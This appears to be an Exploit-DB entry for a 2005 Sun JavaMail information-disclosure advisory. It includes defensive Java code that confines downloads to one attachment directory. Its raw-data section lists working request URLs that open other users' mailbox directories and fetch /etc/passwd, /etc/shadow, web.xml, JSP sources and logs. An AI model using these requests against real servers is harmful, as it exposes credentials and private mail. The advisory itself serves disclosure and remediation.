Vendor: JavaMail
By: SecurityFocus
CVSS: 7.5 (HIGH)
Information Disclosure
CWE: 200
Product Name: JavaMail
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Sun JavaMail Multiple Information Disclosure Vulnerabilities

Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The first issue allows a remote attacker to reveal the contents of email attachments of other users. The second issue allows a remote attacker to download and peruse arbitrary files with the privileges of the affected service. A remote attacker may exploit these issues to disclose potentially sensitive information that could be used to aid in further attacks.

Mitigation:

Input validation should be performed to ensure that user-supplied data is properly sanitized.
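
The mitigation above, shown as an added example that is not part of the original advisory and is not Sun's code: a download handler that only serves files resolved inside one attachment directory, plus an ownership check for mailbox paths. The class name `DownloadGuard`, both method names, the attachment base directory and the session user value are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.util.Optional;

// Added example, not Sun's code. All names here are hypothetical.
public class DownloadGuard {

    // Map a client-supplied name to a file inside baseDir, or return empty.
    static Optional<Path> resolveDownload(Path baseDir, String requested) throws IOException {
        if (requested == null || requested.isEmpty()) {
            return Optional.empty();
        }
        Path base = baseDir.toRealPath();            // canonical base, symlinks resolved
        Path candidate;
        try {
            // resolve() returns an absolute argument unchanged, so "/etc/passwd"
            // stays outside base; normalize() collapses "../" sequences.
            candidate = base.resolve(requested).normalize();
        } catch (InvalidPathException e) {           // NUL bytes, illegal characters
            return Optional.empty();
        }
        if (!candidate.startsWith(base) || !Files.isRegularFile(candidate)) {
            return Optional.empty();
        }
        Path real = candidate.toRealPath();          // follow symlinks, then re-check
        return real.startsWith(base) ? Optional.of(real) : Optional.empty();
    }

    // A mailbox path segment is served only to the user who owns it.
    static boolean mayReadMailbox(String sessionUser, String mailbox) {
        return sessionUser != null && sessionUser.equals(mailbox);
    }

    public static void main(String[] args) throws IOException {
        Path base = Files.createTempDirectory("attachments");   // constructed sample store
        Files.writeString(base.resolve("report.txt"), "sample");
        String[] requests = {                                   // constructed requests
            "report.txt", "/etc/passwd", "../../etc/passwd",
            "/var/serviceprovider/web/WEB-INF/web.xml"
        };
        for (String r : requests) {
            boolean ok = resolveDownload(base, r).isPresent();
            System.out.println(r + " -> " + (ok ? "served" : "rejected"));
        }
        System.out.println("user1 reads user2 mailbox: "
                + mayReadMailbox("user1@example.com", "user2@example.com"));
    }
}
```

Keeping the attachment directory outside the web root means application files such as `WEB-INF/web.xml` and the JSP sources can never satisfy the `startsWith(base)` check.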

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13753/info

Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The following issues are reported:

A remote attacker may reveal the contents of email attachments of other users.

A remote attacker may download and peruse arbitrary files with the privileges of the affected service.

A remote attacker may exploit these issues to disclose potentially sensitive information that could be used to aid in further attacks. 

First issue:
http://example.com/mailboxesdir/user2@example.com/
http://example.com/mailboxesdir/user3@example.com/

Second issue:
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
http://example.com/Download?/etc/passwd
http://example.com/Download?/etc/shadow
http://example.com/Download?/etc/group
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog